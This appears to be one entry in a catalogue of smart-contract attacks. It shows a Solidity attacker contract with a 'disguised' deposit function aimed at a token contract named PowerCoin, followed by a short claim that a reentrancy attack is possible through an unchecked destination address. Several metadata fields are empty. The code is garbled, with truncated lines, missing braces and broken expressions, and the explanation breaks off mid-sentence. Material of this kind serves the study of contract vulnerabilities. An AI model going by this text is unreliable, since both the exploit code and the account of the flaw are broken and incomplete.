Attack 14ΒΆ

Contract Name


Contract Address


Transaction Count


Invovled Ethers

0 Ethers

Length of the Call Chain

1 external function

Victim Function


Attack Mechanisim

Attack code:

contract Attack is IERC20Token{
    PowerCoin p = new PowerCoin();
    constructor() payable {}

    function deposit() public {   // Disguised attack function
        // eth)(bytes4(keccak256("contribution(uint256)")), 10);, 10, 10);

    function() payable {, 10, 10);

    function getvalue() returns (uint) {
        return this.balance;

Attacked code:

contract PowerCoin is Ownable, StandardToken {
    string public name = "CapricornCoin";
    string public symbol = "CCC";
    uint public decimals = 18;                  // token has 18 digit precision

    uint public totalSupply = 10 * (10**6) * (10**18);  // 10 Million Tokens

    event ET(address indexed _pd, uint _tkA, uint _etA);

    function eT(address _pd, uint _tkA, uint _etA) returns (bool success) {
        balances[msg.sender] = safeSub(balances[msg.sender], _tkA);
        balances[_pd] = safeAdd(balances[_pd], _tkA);
        if (! revert();
        ET(_pd, _tkA, _etA);
        return true;

In this case, the attacker can lauch reentrancy attack by calling, because _pd is tainted and there are not any conditions to check the value of transaction destination.

Attack. The attacker can call deposit to start attack.